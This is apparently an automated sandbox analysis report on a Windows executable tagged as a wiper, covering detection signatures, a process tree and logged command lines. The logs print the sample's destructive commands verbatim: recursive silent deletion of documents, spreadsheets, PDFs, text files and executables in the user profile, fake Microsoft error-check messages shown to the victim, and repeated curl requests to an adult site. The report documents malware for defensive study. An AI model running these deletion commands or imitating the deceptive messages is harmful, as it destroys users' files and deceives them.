Loading ...

Play interactive tourEdit tour

Windows Analysis Report Z0hOr2pD7k

Overview

General Information

Sample Name:Z0hOr2pD7k (renamed file extension from none to exe)
Analysis ID:452577
MD5:8edf0aa789d976df0c80fd8d62734ded
SHA1:54a8b718fda1ea749df17271d3f897c947004483
SHA256:fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97
Tags:exeupxwiper
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect virtual machines (IN, VMware)
Deletes itself after installation
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Z0hOr2pD7k.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\Z0hOr2pD7k.exe' MD5: 8EDF0AA789D976DF0C80FD8D62734DED)
    • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6608 cmdline: C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6632 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6664 cmdline: C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7076 cmdline: C:\Windows\system32\cmd.exe /c echo Wait a minute... MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c @echo OFF MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7100 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6136 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3148 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3560 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 772 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5252 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 492 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6228 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1000 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6312 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6160 cmdline: C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6364 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1280 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7148 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6820 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6860 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6892 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4664 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1296 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5748 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6724 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5912 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 6504 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 796 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4420 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2016 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 7124 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 2812 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1904 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 4944 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5352 cmdline: C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Z0hOr2pD7k.exeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: Z0hOr2pD7k.exeVirustotal: Detection: 55%Perma Link
Source: Z0hOr2pD7k.exeMetadefender: Detection: 20%Perma Link
Source: Z0hOr2pD7k.exeReversingLabs: Detection: 39%
Machine Learning detection for sampleShow sources
Source: Z0hOr2pD7k.exeJoe Sandbox ML: detected
Source: 0.0.Z0hOr2pD7k.exe.9c0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: Z0hOr2pD7k.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Z0hOr2pD7k.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmpString found in binary or memory: https://www.xvideos.com
Source: Z0hOr2pD7k.exe, 00000000.00000002.917145240.00000000010FD000.00000004.00000001.sdmpString found in binary or memory: https://www.xvideos.com/video64080443/_
Source: cmd.exeProcess created: 123
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C14A00_2_009C14A0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C15A00_2_009C15A0
Source: Z0hOr2pD7k.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0.2.Z0hOr2pD7k.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: classification engineClassification label: mal76.spyw.evad.winEXE@128/22@0/0
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_009C10D0 72A73930,CreateToolhelp32Snapshot,Process32First,Process32First,76A06610,76A06610,Process32Next,76A06610,GetClassNameA,76A06610,76A06610,0_2_009C10D0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Z0hOr2pD7k.exeVirustotal: Detection: 55%
Source: Z0hOr2pD7k.exeMetadefender: Detection: 20%
Source: Z0hOr2pD7k.exeReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Users\user\Desktop\Z0hOr2pD7k.exe 'C:\Users\user\Desktop\Z0hOr2pD7k.exe'
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
